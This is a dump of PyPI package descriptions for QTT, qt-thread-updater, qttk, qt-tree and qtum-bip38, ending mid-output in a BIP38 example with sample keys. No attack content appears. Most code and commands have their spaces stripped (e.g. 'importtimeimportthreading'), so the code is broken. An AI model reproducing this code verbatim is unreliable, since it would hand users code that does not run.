(encountered on Linux) PyQt5 gives an error when installing try upgrading pippipinstall--upgradepipand rerun the respective install command.When incompatibility problems ariseNote: This step is not meant for python >=3.11Sometimes the default installation does not work because of incompatible dependencies between the used packages\non your system. To be sure you use all the right versions of the packages used by QTT and its dependencies do:pipinstall.-rrequirements_lock_py310.txtor for developmentpipinstall-e.-rrequirements_lock_py310.txtThis will install a tested set of all the packages QTT depends on.TestingTests for the QTT packages are contained in the subdirectorytests. To run the tests run the following command:pytestWhen integration tests fail because of errors in plotting try downgrading opencv-python to 4.2.0.34:pipinstallopencv-python==4.2.0.34When running on Windows Sysbsystem for Linux (WSL) you may need to uninstall opencv and install the headless version:pipuninstallopencv-python\npipinstallopencv-python-headlessInstalling for generating documentationTo install the necessary packages to perform documentation activities for QTT do:pipinstall-e.[rtd]The documentation generation process is dependent on pandoc. When you want to generate the\ndocumentation and pandoc is not yet installed on your system navigate\ntoPandocand follow the instructions found there to install pandoc.\nTo build the 'readthedocs' documentation do:cddocs\nmakehtmlVandersypen research groupFor the Vandersypen research group there are more detailed instructions, read the file INSTALL.md in the spin-projects\nrepository.Updating QTTTo update QTT do:pipinstall.--upgradeUsageSee thedocumentationand the example notebooks in thedocs/notebooksdirectory.For a general introduction also seeIntroduction to GithubScientific python lecturesIf you useSpyderthen use the following settings:Use aIPythonconsole and inTools->Preferences->IPython console->Graphicsset the IPython backend graphics option toQt5. This ensures correctly displaying theParameterViewerandDataBrowserInTools->Preferences->Console->Advanced settingsuncheck the boxEnable UMRContributingSeeContributingfor information about bug/issue reports, contributing code, style, and testingLicenseSeeLicense"} +{"package": "qtterm", "pacakge-description": "No description available on PyPI."} +{"package": "qt-thread-updater", "pacakge-description": "Python Qt thread updater to update GUI items using a separate thread.This library allows you to efficiently update Qt GUI elements from a separate thread. Qt GUI elements are not thread\nsafe. Method calls likeLabel.setTextdo not work in a separate thread. This library solves that problem.UtilitiesThe ThreadUpdater offers several utilities to help with updating a widget\u2019s value.call_latest - Call the given function with the most recent value in the main thread using the timer.It is safe to call this many times with the same function.If the given function is called multiple times it is only called once with the most recent value.call_in_main - Call the given function in the main thread using the timer.Every time you call this function the given function will be called in the main threadIf the given function is called multiple times it will be called every time in the main thread.If this function is called too many times it could slow down the main event loop.register_continuous - Register a function to be called every time theThreadUpdater.updatemethod is called.Thetimeoutvariable (in seconds) indicates how often the registered functions will be called.delay - Call a function after the given number of seconds has passed.This will not be accurate. Accuracy can be improved by lowering the timeout to increase how often the timer runs.ThreadUpdater ExamplesBelow are some examples of how the ThreadUpdater would normally be used.Simple Thread ExampleThe example below tells the update to run lbl.setText in the main thread with the latest value.importtimeimportthreadingfromqtpyimportQtWidgetsfromqt_thread_updaterimportget_updaterapp=QtWidgets.QApplication.instance()orQtWidgets.QApplication([])lbl=QtWidgets.QLabel(\"Latest Count: 0\")lbl.resize(300,300)lbl.show()data={'counter':0}defrun(is_alive):is_alive.set()whileis_alive.is_set():text='Latest Count:{}'.format(data['counter'])get_updater().call_latest(lbl.setText,text)data['counter']+=1time.sleep(0.001)# Not needed (still good to have some delay to release the thread)alive=threading.Event()th=threading.Thread(target=run,args=(alive,))th.start()app.exec_()alive.clear()Continuous Update ExampleThe example below continuously runs the update function every timeThreadUpdater.update()is called from the timer.\nThis may be inefficient if there is no new data to update the label with.importtimeimportthreadingfromqtpyimportQtWidgetsimportqt_thread_updater# from qt_thread_updater import get_updaterapp=QtWidgets.QApplication.instance()orQtWidgets.QApplication([])lbl=QtWidgets.QLabel(\"Continuous Count: 0\")lbl.resize(300,300)lbl.show()data={'counter':0}qt_thread_updater.set_updater(qt_thread_updater.ThreadUpdater(1/60))@qt_thread_updater.register_continuousdefupdate():\"\"\"Update the label with the current value.\"\"\"lbl.setText('Continuous Count:{}'.format(data['counter']))# get_updater().register_continuous(update)defrun(is_alive):is_alive.set()whileis_alive.is_set():data['counter']+=1# time.sleep(0.001) # Not needed (still good to have some delay to release the thread)alive=threading.Event()th=threading.Thread(target=run,args=(alive,))th.start()qt_thread_updater.delay(5,app.quit)# Quit after 5 secondsapp.exec_()alive.clear()cleanup_app()Call In Main ExampleThe example below calls the append function every time. It may not be efficient.importtimeimportthreadingfromqtpyimportQtWidgetsfromqt_thread_updaterimportget_updaterapp=QtWidgets.QApplication.instance()orQtWidgets.QApplication([])text_edit=QtWidgets.QTextEdit()text_edit.resize(300,300)text_edit.setReadOnly(True)text_edit.show()data={'counter':0}defrun(is_alive):is_alive.set()whileis_alive.is_set():text='Main Count:{}'.format(data['counter'])get_updater().call_in_main(text_edit.append,text)data['counter']+=1time.sleep(0.01)# Some delay/waiting is requiredalive=threading.Event()th=threading.Thread(target=run,args=(alive,))th.start()app.exec_()alive.clear()Delay ExampleThe example below calls the append function after X number of seconds has passed. The delay function will not be\naccurate, but guarantees that the function is called after X number of seconds. To increase accuracy give theThreadUpdatera smaller timeout for it to run at a faster rate.importtimeimportthreadingfromqtpyimportQtWidgetsfromqt_thread_updaterimportget_updaterapp=QtWidgets.QApplication.instance()orQtWidgets.QApplication([])text_edit=QtWidgets.QTextEdit()text_edit.resize(300,300)text_edit.setReadOnly(True)text_edit.show()now=time.time()defupdate_text(set_time):text_edit.append('Requested{:.04f}Updated{:.04f}'.format(set_time,time.time()-now))# Lower the timeout so it runs at a faster rate.get_updater().timeout=0# 0.0001 # Qt runs in millisecondsget_updater().delay(0.5,update_text,0.5)get_updater().delay(1,update_text,1)get_updater().delay(1.5,update_text,1.5)get_updater().delay(2,update_text,2)get_updater().delay(2.5,update_text,2.5)get_updater().delay(3,update_text,3)app.exec_()WidgetsI\u2019ve decdied to include a couple of useful Qt Widgets with this library.QuickPlainTextEdit - Used to display fast streams of dataQuickTextEdit - Display fast streams of data with color.QuickPlainTextEditQuickly display data from a separate thread.importtimeimportthreadingfromqtpyimportQtWidgetsfromqt_thread_updater.widgets.quick_text_editimportQuickPlainTextEditapp=QtWidgets.QApplication.instance()orQtWidgets.QApplication([])text_edit=QuickPlainTextEdit()text_edit.resize(300,300)text_edit.show()data={'counter':0}defrun(is_alive):is_alive.set()whileis_alive.is_set():text='Main Count:{}\\n'.format(data['counter'])text_edit.write(text)data['counter']+=1time.sleep(0.0001)# Some delay is usually required to let the Qt event loop run (not needed if IO used)alive=threading.Event()th=threading.Thread(target=run,args=(alive,))th.start()app.exec_()alive.clear()QuickTextEditQuickly display data from a separate thread using color.importtimeimportthreadingfromqtpyimportQtWidgetsfromqt_thread_updater.widgets.quick_text_editimportQuickTextEditapp=QtWidgets.QApplication.instance()orQtWidgets.QApplication([])text_edit=QuickTextEdit()text_edit.resize(300,300)text_edit.show()data={'counter':0}defrun(is_alive):is_alive.set()whileis_alive.is_set():text='Main Count:{}\\n'.format(data['counter'])text_edit.write(text,'blue')data['counter']+=1time.sleep(0.0001)# Some delay is usually required to let the Qt event loop run (not needed if IO used)alive=threading.Event()th=threading.Thread(target=run,args=(alive,))th.start()app.exec_()alive.clear()QuickTextEdit RedirectDisplay print (stdout and stderr) in a QTextEdit with color.importsysimporttimeimportthreadingfromqtpyimportQtWidgetsfromqt_thread_updater.widgets.quick_text_editimportQuickTextEditapp=QtWidgets.QApplication.instance()orQtWidgets.QApplication([])text_edit=QuickTextEdit()text_edit.resize(300,300)text_edit.show()sys.stdout=text_edit.redirect(sys.__stdout__,color='blue')sys.stderr=text_edit.redirect(sys.__stderr__,color='red')data={'counter':0}defrun(is_alive):is_alive.set()whileis_alive.is_set():stdout_text='Main Count:{}'.format(data['counter'])# Print gives \\n automaticallyerror_text='Error Count:{}'.format(data['counter'])# Print gives \\n automatically# Print automatically give '\\n' with the \"end\" keyword argument.print(stdout_text)# Print will write to sys.stdout where the rediect will write to text_edit and stdoutprint(error_text,file=sys.stderr)# Print to sys.stderr. Rediect will write to text_edit and stderrdata['counter']+=1# Some delay is usually desired. print/sys.__stdout__ uses IO which gives time for Qt's event loop.# time.sleep(0.0001)alive=threading.Event()th=threading.Thread(target=run,args=(alive,))th.start()app.exec_()alive.clear()"} +{"package": "qttk", "pacakge-description": "qttk[qttk] Quantitative Trading ToolKit - Quant trading library developed by Conlan Scientific Open-Source Research CohortDesign PhilosophyConsistentDate-indexedpandasobjects are the core data structure.TransparentTest cases are clear and serve as an additional layer of documentation. Type hints are used liberally.PerformantExecution speed tests are built into test cases. Only the fastest functions get published.Getting Started withqttkInstall from PyPI usingpip install qttk. Try the following sample.# Indicators module contains core qttk functionalityfromqttk.indicatorsimportcompute_rsi# qttk is 'batteries included' with simulated datafromqttk.utils.sample_dataimportload_sample_data# Load a ticker from csv into dataframedf=load_sample_data('AWU')print(df.head())rsi=compute_rsi(df)print(rsi[-10:])Next StepsCheck outsome demos on GitHub.Feel free to create a bug or feature request ticket:qttk issue tracker."} +{"package": "qttools", "pacakge-description": "Some convenience classes for PyQt5."} +{"package": "qttp", "pacakge-description": "No description available on PyPI."} +{"package": "qttpte", "pacakge-description": "WelcomeWelcome to the QTT framework. This README will shortly introduce the framework, and it will guide you through the structure, installation process and how to contribute. We look forward to working with you!Quantum Technology ToolboxQuantum Technology Toolbox (QTT) is a Python-based framework developed initially by QuTech for the tuning and calibration of\nquantum dots and spin qubits.QuTechis an advanced research center based in Delft, the Netherlands, for quantum\ncomputing and quantum internet, a collaboration founded by theUniversity of Technology Delft(TU Delft) and\nthe Netherlands Organisation for Applied Scientific Research (TNO).For usage of QTT see the detaileddocumentationon readthedocs.io.QTT is the framework on which you can base your measurement and analysis scripts. QTT is based\nonQCoDeS(basic framework such as instrument drivers, DataSet) and theSciPyecosystem.InstallationQTT is compatible with Python 3.7+. QTT can be installed as a pip package to be used in a (virtual) Python environment.\nWe assume that software packages likegitandpythonare already installed on your system.Note: when running Ubuntu Linux, installing these packages is done via:sudo apt install git gcc python3.7 python3.7-venv python3.7-devfor Python 3.7.x. Other Linux distributions require similar steps.Setting up a virtual environmentTo create a clean virtual Python environment for your QTT development do:mkdir qtt\ncd qttNow activate the virtual environment. On Linux do:python3 -m venv env\n. ./env/bin/activateorsource ./env/bin/activateOn Windows do:python -m pip install virtualenv\npython -m virtualenv --copies env\nenv\\Scripts\\activate.batNow we are ready to install QTT.Installation from PyPITo use QTT, install it as a pip package:pip install qttor install QTT from source.Installing from sourceThe source for QTT can be found at Github.\nFor the default installation from the QTT source directory execute:git clone https://github.com/QuTech-Delft/qtt.git\ncd qtt\npip install wheelFor QTT development install QTT in editable mode:pip install -e .For non-editable mode do:pip install .When (encountered on Linux) PyQt5 gives an error when installing try upgrading pippip install --upgrade pipand rerun the respective install command.When incompatibility problems ariseSometimes the default installation does not work because of incompatible dependencies between the used packages\non your system. To be sure you use all the right versions of the packages used by QTT and its dependencies do:pip install . -r requirements_lock.txtor for developmentpip install -e . -r requirements_lock.txtThis will install a tested set of all the packages QTT depends on.TestingTests for the QTT packages are contained in the subdirectorytests. To run the tests run the following command:pytestWhen integration tests fail because of errors in plotting try downgrading opencv-python to 4.2.0.34:pip install opencv-python==4.2.0.34Installing for generating documentationTo install the necessary packages to perform documentation activities for QTT do:pip install -e .[rtd]The documentation generation process is dependent on pandoc. When you want to generate the\ndocumentation and pandoc is not yet installed on your system navigate\ntoPandocand follow the instructions found there to install pandoc.\nTo build the 'readthedocs' documentation do:cd docs\nmake htmlVandersypen research groupFor the Vandersypen research group there are more detailed instructions, read the file INSTALL.md in the spin-projects\nrepository.Updating QTTTo update QTT do:pip install . --upgradeUsageSee thedocumentationand the example notebooks in thedocs/notebooksdirectory.For a general introduction also seeIntroduction to GithubScientific python lecturesIf you useSpyderthen use the following settings:Use aIPythonconsole and inTools->Preferences->IPython console->Graphicsset the IPython backend graphics option toQt5. This ensures correctly displaying theParameterViewerandDataBrowserInTools->Preferences->Console->Advanced settingsuncheck the boxEnable UMRContributingSeeContributingfor information about bug/issue reports, contributing code, style, and testingLicenseSeeLicense"} +{"package": "qt-tree", "pacakge-description": "QtTreeQtTree provides a graphical user interface for editing and visualizing tree data structure.Installationpip install qt-treeUsageCheckdemo.pyto know how this library can use.LicenseMIT License.ReferenceQtTree exploits the following libraries:https://github.com/LeGoffLoic/Nodzhttps://github.com/c0fec0de/anytree"} +{"package": "qt-ui-file-sorter", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qtum-bip38", "pacakge-description": "Qtum-BIP38Python library for implementation of BIP38 for Qtum. It supports bothNo EC-multiplyandEC-multiplymodes.For more info see thePassphrase-protected private key - BIP38spec.InstallationThe easiest way to installqtum-bip38is via pip:pip install qtum-bip38If you want to run the latest version of the code, you can install from the git:pip install git+git://github.com/qtumproject/qtum-bip38.gitDocumentationRead here:https://bip38.readthedocs.ioWhen you import, replacebip38toqtum_bip38package name.Quick Usageno EC multiply:#!/usr/bin/env python3fromqtum_bip38import(private_key_to_wif,bip38_encrypt,bip38_decrypt)fromtypingimport(List,Literal)importjson# Private keyPRIVATE_KEY:str=\"cbf4b9f70470856bb4f40f80b87edb90865997ffee6df315ab166d713af433a5\"# Passphrase / passwordPASSPHRASE:str=\"qtum123\"# u\"\\u03D2\\u0301\\u0000\\U00010400\\U0001F4A9\"# Network typeNETWORK:Literal[\"mainnet\",\"testnet\"]=\"mainnet\"# To show detailDETAIL:bool=True# Wallet Important Format'sWIFs:List[str]=[private_key_to_wif(private_key=PRIVATE_KEY,wif_type=\"wif\",network=NETWORK),# No compressionprivate_key_to_wif(private_key=PRIVATE_KEY,wif_type=\"wif-compressed\",network=NETWORK)# Compression]forWIFinWIFs:print(\"WIF:\",WIF)encrypted_wif:str=bip38_encrypt(wif=WIF,passphrase=PASSPHRASE,network=NETWORK)print(\"BIP38 Encrypted WIF:\",encrypted_wif)print(\"BIP38 Decrypted:\",json.dumps(bip38_decrypt(encrypted_wif=encrypted_wif,passphrase=PASSPHRASE,network=NETWORK,detail=DETAIL),indent=4))print(\"-\"*125)OutputWIF:5KN7MzqK5wt2TP1fQCYyHBtDrXdJuXbUzm4A9rKAteGu3Qi5CVR\nBIP38EncryptedWIF:6PRP4FDk4BWidB539rEWBH26DRcG2tavQg52WRcyuK5dxMdu8WHVftRZof\nBIP38Decrypted:{\"wif\":\"5KN7MzqK5wt2TP1fQCYyHBtDrXdJuXbUzm4A9rKAteGu3Qi5CVR\",\"private_key\":\"cbf4b9f70470856bb4f40f80b87edb90865997ffee6df315ab166d713af433a5\",\"wif_type\":\"wif\",\"public_key\":\"04d2ce831dd06e5c1f5b1121ef34c2af4bcb01b126e309234adbc3561b60c9360ea7f23327b49ba7f10d17fad15f068b8807dbbc9e4ace5d4a0b40264eefaf31a4\",\"public_key_type\":\"uncompressed\",\"seed\":null,\"address\":\"QeS5U4AEaxPpJ8swzLHEcNbAaNkDfpWjQN\",\"lot\":null,\"sequence\":null}-----------------------------------------------------------------------------------------------------------------------------\nWIF:L44B5gGEpqEDRS9vVPz7QT35jcBG2r3CZwSwQ4fCewXAhAhqGVpP\nBIP38EncryptedWIF:6PYUYP8xySgSbqtYXHGfWUn1xL9F3r9qKru8CUbqeK94QSrJcrSAmZoaEd\nBIP38Decrypted:{\"wif\":\"L44B5gGEpqEDRS9vVPz7QT35jcBG2r3CZwSwQ4fCewXAhAhqGVpP\",\"private_key\":\"cbf4b9f70470856bb4f40f80b87edb90865997ffee6df315ab166d713af433a5\",\"wif_type\":\"wif-compressed\",\"public_key\":\"02d2ce831dd06e5c1f5b1121ef34c2af4bcb01b126e309234adbc3561b60c9360e\",\"public_key_type\":\"compressed\",\"seed\":null,\"address\":\"QRfLX1RpJN25v2jKGPYsQHu8G1ag3sHJeL\",\"lot\":null,\"sequence\":null}-----------------------------------------------------------------------------------------------------------------------------EC multiply:#!/usr/bin/env python3fromqtum_bip38import(intermediate_code,create_new_encrypted_wif,confirm_code,bip38_decrypt)fromtypingimport(List,Literal)importjsonimportos# Passphrase / passwordPASSPHRASE:str=\"qtum123\"# u\"\\u03D2\\u0301\\u0000\\U00010400\\U0001F4A9\"# Network typeNETWORK:Literal[\"mainnet\",\"testnet\"]=\"mainnet\"# To show detailDETAIL:bool=True# List of samples with owner salt, seed, public key type, lot, and sequenceSAMPLES:List[dict]=[# Random owner salt & seed, No compression, No lot & sequence{\"owner_salt\":os.urandom(8),\"seed\":os.urandom(24),\"public_key_type\":\"uncompressed\",\"lot\":None,\"sequence\":None},# Random owner salt & seed, No compression, With lot & sequence{\"owner_salt\":os.urandom(8),\"seed\":os.urandom(24),\"public_key_type\":\"uncompressed\",\"lot\":863741,\"sequence\":1},# Random owner salt & seed, Compression, No lot & sequence{\"owner_salt\":os.urandom(8),\"seed\":os.urandom(24),\"public_key_type\":\"compressed\",\"lot\":None,\"sequence\":None},# Random owner salt & seed, Compression, With lot & sequence{\"owner_salt\":os.urandom(8),\"seed\":os.urandom(24),\"public_key_type\":\"compressed\",\"lot\":863741,\"sequence\":1},# With owner salt & seed, No compression, No lot & sequence{\"owner_salt\":\"75ed1cdeb254cb38\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"public_key_type\":\"uncompressed\",\"lot\":None,\"sequence\":None},# With owner salt & seed, No compression, With lot & sequence{\"owner_salt\":\"75ed1cdeb254cb38\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"public_key_type\":\"uncompressed\",\"lot\":567885,\"sequence\":1},# With owner salt & seed, Compression, No lot & sequence{\"owner_salt\":\"75ed1cdeb254cb38\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"public_key_type\":\"compressed\",\"lot\":None,\"sequence\":None},# With owner salt & seed, Compression, With lot & sequence{\"owner_salt\":\"75ed1cdeb254cb38\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"public_key_type\":\"compressed\",\"lot\":369861,\"sequence\":1},]forSAMPLEinSAMPLES:intermediate_passphrase:str=intermediate_code(passphrase=PASSPHRASE,owner_salt=SAMPLE[\"owner_salt\"],lot=SAMPLE[\"lot\"],sequence=SAMPLE[\"sequence\"])print(\"Intermediate Passphrase:\",intermediate_passphrase)encrypted_wif:dict=create_new_encrypted_wif(intermediate_passphrase=intermediate_passphrase,public_key_type=SAMPLE[\"public_key_type\"],seed=SAMPLE[\"seed\"],network=NETWORK)print(\"Encrypted WIF:\",json.dumps(encrypted_wif,indent=4))print(\"Confirm Code:\",json.dumps(confirm_code(passphrase=PASSPHRASE,confirmation_code=encrypted_wif[\"confirmation_code\"],network=NETWORK,detail=DETAIL),indent=4))print(\"BIP38 Decrypted:\",json.dumps(bip38_decrypt(encrypted_wif=encrypted_wif[\"encrypted_wif\"],passphrase=PASSPHRASE,network=NETWORK,detail=DETAIL),indent=4))print(\"-\"*125)OutputIntermediatePassphrase:passphraserBh92DkAgrAfqUTZoL8daK85X4UtSzQnEFABTmZf6prj1bAa6kPihApMd92xmw\nEncryptedWIF:{\"encrypted_wif\":\"6PfVzPRrrLrv3geDZV6GWcLfGRHBGagK31jBTTBd5f5QknK2S1p1ajLMe6\",\"confirmation_code\":\"cfrm38V5kycvZygpKdQmq3TjNED2womqd24UgVxFaxCuBnEAqp1aCUqQLSSAJBifBkcQDj33EcP\",\"public_key\":\"0440097fbf7fc6a3dea0962ee4e1701a9cd3964eb0223f243b759e1c04fda754ab88efcdb76753217c7d7b6456932bb8d77e5db1b4de3b22ce561d5daec1c8f809\",\"seed\":\"8637d0313eac9aab134ace0d010cf7856ffd2275cd4aba4c\",\"public_key_type\":\"uncompressed\",\"address\":\"QTPiD2P1zBz5fiGXxBkLdDyhySqTR7dvuy\"}ConfirmCode:{\"public_key\":\"0440097fbf7fc6a3dea0962ee4e1701a9cd3964eb0223f243b759e1c04fda754ab88efcdb76753217c7d7b6456932bb8d77e5db1b4de3b22ce561d5daec1c8f809\",\"public_key_type\":\"uncompressed\",\"address\":\"QTPiD2P1zBz5fiGXxBkLdDyhySqTR7dvuy\",\"lot\":null,\"sequence\":null}BIP38Decrypted:{\"wif\":\"5JSLzkUVB6ifEHgQBYrNKBpupV9SFccSfYiVjazAu3bpykVLJ5z\",\"private_key\":\"51e047d800758ea123d778f0bc7b375ef7a4a980ed5defaa9d535bc22d728e60\",\"wif_type\":\"wif\",\"public_key\":\"0440097fbf7fc6a3dea0962ee4e1701a9cd3964eb0223f243b759e1c04fda754ab88efcdb76753217c7d7b6456932bb8d77e5db1b4de3b22ce561d5daec1c8f809\",\"public_key_type\":\"uncompressed\",\"seed\":\"8637d0313eac9aab134ace0d010cf7856ffd2275cd4aba4c\",\"address\":\"QTPiD2P1zBz5fiGXxBkLdDyhySqTR7dvuy\",\"lot\":null,\"sequence\":null}-----------------------------------------------------------------------------------------------------------------------------\nIntermediatePassphrase:passphrasea9wRhemdARJDoZzZMiVcmZaBrQYhofqaNuTAHgLyQmoUjLmpwFtyzFvjcoPRqA\nEncryptedWIF:{\"encrypted_wif\":\"6PgP82oWUAUAVAT41HBXsWih74ZSC5GT5dMbFWoxPYgLHHYbgo3XM7yJ3C\",\"confirmation_code\":\"cfrm38V8dbJk9zPFcbN84DF4u4mnkGBMrmM56rtWQyt22aDLNqfYmgEyYuLVq1uEW41LdqVfaf7\",\"public_key\":\"045c68c340753c4f416f44cf94eaa2240f0ed054332c87d9a6c4e0bcb4f6f5ebaaaf325b62f066a4e561ec1fd8d3bc546cddbe97889c59a2fd60e2d89b101a1171\",\"seed\":\"88cfd3b2a526ff29a62d429e52e597c24af6465edd011de3\",\"public_key_type\":\"uncompressed\",\"address\":\"Qf5NdtPRxsNeUTPckEyMW6cc7JpipJRJSw\"}ConfirmCode:{\"public_key\":\"045c68c340753c4f416f44cf94eaa2240f0ed054332c87d9a6c4e0bcb4f6f5ebaaaf325b62f066a4e561ec1fd8d3bc546cddbe97889c59a2fd60e2d89b101a1171\",\"public_key_type\":\"uncompressed\",\"address\":\"Qf5NdtPRxsNeUTPckEyMW6cc7JpipJRJSw\",\"lot\":863741,\"sequence\":1}BIP38Decrypted:{\"wif\":\"5JhYHSPBT4XHuzyjGgxiL6be1zGJzQGoSrRRm7ijWccASdLiCkC\",\"private_key\":\"746098bcac5ecbd247f8fd1ca75340bc95bffa53e800169deb77b7e7143b246b\",\"wif_type\":\"wif\",\"public_key\":\"045c68c340753c4f416f44cf94eaa2240f0ed054332c87d9a6c4e0bcb4f6f5ebaaaf325b62f066a4e561ec1fd8d3bc546cddbe97889c59a2fd60e2d89b101a1171\",\"public_key_type\":\"uncompressed\",\"seed\":\"88cfd3b2a526ff29a62d429e52e597c24af6465edd011de3\",\"address\":\"Qf5NdtPRxsNeUTPckEyMW6cc7JpipJRJSw\",\"lot\":863741,\"sequence\":1}-----------------------------------------------------------------------------------------------------------------------------\nIntermediatePassphrase:passphrasemh3J6kj36t1846BnPFZL1caQN55pJfdcSSCztsQLBzF3jETYppiU5xYSsZrC5e\nEncryptedWIF:{\"encrypted_wif\":\"6PnSDkPgRS869GdKSHbUkm6VdKzUZiEtuDSUQUuYAJ2VumpTo3Y7cXbjFc\",\"confirmation_code\":\"cfrm38VUMfQFA5nUna7HpkQoiQSWMmw64rnPF3Zwu6g6S6CnXoXDey3Ptovhr9DKZymFQRYnesB\",\"public_key\":\"0208d6c6104daf76cdf8eb4ee75afd83b5776fd120e2d9a7cb78df5268fe534a37\",\"seed\":\"4bc118a7011b225af9e475f21816e8e71d47c103846e19c2\",\"public_key_type\":\"compressed\",\"address\":\"QgCL3wEfZP7RPQ3RRhazRx9Buuq2PLLqoG\"}ConfirmCode:{\"public_key\":\"0208d6c6104daf76cdf8eb4ee75afd83b5776fd120e2d9a7cb78df5268fe534a37\",\"public_key_type\":\"compressed\",\"address\":\"QgCL3wEfZP7RPQ3RRhazRx9Buuq2PLLqoG\",\"lot\":null,\"sequence\":null}BIP38Decrypted:{\"wif\":\"L4ybEBRKhicidQbeGHjy4f4Wyvad5Kgnwk7FqeQntqwUMcr7ERF1\",\"private_key\":\"e76f72811b89f63d88a7329eeedef16710ea66714672021a177e07fd5473f61a\",\"wif_type\":\"wif-compressed\",\"public_key\":\"0208d6c6104daf76cdf8eb4ee75afd83b5776fd120e2d9a7cb78df5268fe534a37\",\"public_key_type\":\"compressed\",\"seed\":\"4bc118a7011b225af9e475f21816e8e71d47c103846e19c2\",\"address\":\"QgCL3wEfZP7RPQ3RRhazRx9Buuq2PLLqoG\",\"lot\":null,\"sequence\":null}-----------------------------------------------------------------------------------------------------------------------------\nIntermediatePassphrase:passphraseZi3JhthoBvhc8wenvQW7Hd7jBcmNjMKg544pQE2kVd5NCvt8qqoV6RLUaWZrEV\nEncryptedWIF:{\"encrypted_wif\":\"6PoE1PPV7YBVbkPZLsKZGE3T6imCpuDq9pxF1v779xtzo4dd8W13tAn2qD\",\"confirmation_code\":\"cfrm38VWvrvCAhjKDVmjnJp1dsTcJphB8YkK9jXygpLAEDQVCoeguazChN5JCpP6EsmWr5iB4wb\",\"public_key\":\"036a8f9c1a4d769b7326037cea69009560dbdb35b749ce1b8e716485a8730cfc09\",\"seed\":\"1140bf8c4f8c4ca09f90cce6da1ea8de1e43ac37165fe27f\",\"public_key_type\":\"compressed\",\"address\":\"QdxToVfxRc5PXtf28STR8u2JpmvpQsevF4\"}ConfirmCode:{\"public_key\":\"036a8f9c1a4d769b7326037cea69009560dbdb35b749ce1b8e716485a8730cfc09\",\"public_key_type\":\"compressed\",\"address\":\"QdxToVfxRc5PXtf28STR8u2JpmvpQsevF4\",\"lot\":863741,\"sequence\":1}BIP38Decrypted:{\"wif\":\"L5BrcjdARTnCVjZa9AbeRR6GpZoP9bqp44Puj7VzvWeBUTYUu597\",\"private_key\":\"edbebe261a5eca1164911bf523f890a4a99051947c34bec7df71db16b29cfb98\",\"wif_type\":\"wif-compressed\",\"public_key\":\"036a8f9c1a4d769b7326037cea69009560dbdb35b749ce1b8e716485a8730cfc09\",\"public_key_type\":\"compressed\",\"seed\":\"1140bf8c4f8c4ca09f90cce6da1ea8de1e43ac37165fe27f\",\"address\":\"QdxToVfxRc5PXtf28STR8u2JpmvpQsevF4\",\"lot\":863741,\"sequence\":1}-----------------------------------------------------------------------------------------------------------------------------\nIntermediatePassphrase:passphraseondJwvQGEWFNsbiN6AVu4r4dPFz4xeJoLg2vQGULvMzgYRKiGezwNDzaAxfX57\nEncryptedWIF:{\"encrypted_wif\":\"6PfMmFWzXobLGrJReqJaNnGcaCMd9T3Xhcwp2jkCHZ6jZoDJ2MnKk15ZuV\",\"confirmation_code\":\"cfrm38V5JArEGuKEKE8VSMDSKvS8eZXYq3DckKyFDtw76GxW1TBzdKcovWdL4PbQnPLvJ5EpmZp\",\"public_key\":\"049e60857454bff0635324e132e00f102fbe1ab6b0846b12737eca18a05b473e2a0afa7d996c7b49b03fb4d070d94fd765841f7e172f7727bfceed65e98f940c2d\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"public_key_type\":\"uncompressed\",\"address\":\"QXsy25WUg3kARS1o4t8si4AsyuwZjLkY9R\"}ConfirmCode:{\"public_key\":\"049e60857454bff0635324e132e00f102fbe1ab6b0846b12737eca18a05b473e2a0afa7d996c7b49b03fb4d070d94fd765841f7e172f7727bfceed65e98f940c2d\",\"public_key_type\":\"uncompressed\",\"address\":\"QXsy25WUg3kARS1o4t8si4AsyuwZjLkY9R\",\"lot\":null,\"sequence\":null}BIP38Decrypted:{\"wif\":\"5JDa1CcN3iLbFeexZC2RhyEkFU2B7oieHAVs5YDwieMhgVS9S9c\",\"private_key\":\"34de039d8e90172f246ec3190fc8bd98e46f11bc5d50d062d0d6f806e43372a9\",\"wif_type\":\"wif\",\"public_key\":\"049e60857454bff0635324e132e00f102fbe1ab6b0846b12737eca18a05b473e2a0afa7d996c7b49b03fb4d070d94fd765841f7e172f7727bfceed65e98f940c2d\",\"public_key_type\":\"uncompressed\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"address\":\"QXsy25WUg3kARS1o4t8si4AsyuwZjLkY9R\",\"lot\":null,\"sequence\":null}-----------------------------------------------------------------------------------------------------------------------------\nIntermediatePassphrase:passphraseb7ruSNPsLdQF57XQM4waP887G6qoGhPVpDS7jEorTKpfXYFxnUSSVwtpQZPT4U\nEncryptedWIF:{\"encrypted_wif\":\"6PgLaWLw6fb6uDBtnN6QVyT9AbvN4zFi8E4oLdSiEWCqsHZFAtcY4wP4LW\",\"confirmation_code\":\"cfrm38V8VJb8xnvVY1kkRRVanmL4F91nfuQAZctydcGYKS8ZjPxyZHnACqfJ3ni1AwaCkDMsWVF\",\"public_key\":\"04263351adcb7d9298c6865a597ef63094a8e79f35110aab71d29347acd29ddb0c22e139924e329ae9a84b806c27f919c5e60f8f299ed004256109658b5c11b7b7\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6c\",\"public_key_type\":\"uncompressed\",\"address\":\"QfAtAjYNEQMAVtxNaXCWcg1rws3ubJJAED\"}ConfirmCode:{\"public_key\":\"04263351adcb7d9298c6865a597ef63094a8e79f35110aab71d29347acd29ddb0c22e139924e329ae9a84b806c27f919c5e60f8f299ed004256109658b5c11b7b7\",\"public_key_type\":\"uncompressed\",\"address\":\"QfAtAjYNEQMAVtxNaXCWcg1rws3ubJJAED\",\"lot\":567885,\"sequence\":1}BIP38Decrypted:{\"wif\":\"5KXP2dhbmUsgPAFU6Uu6iY4ePafMc53fLjs9mdQXbmPvoLtxiSj\",\"private_key\":\"e1013f4521ffeefb06aad092a040189075a5163af3c6cb7ca1622cbea2d498fc\",\"wif_type\":\"wif\",\"public_key\":\"04263351adcb7d9298c6865a597ef63094a8e79f35110aab71d29347acd29ddb0c22e139924e329ae9a84b806c27f919c5e60f8f299ed004256109658b5c11b7b7\",\"public_key_type\":\"uncompressed\",\"seed\":\"99241d58245c883896f80843d2846672d7312e6195ca1a6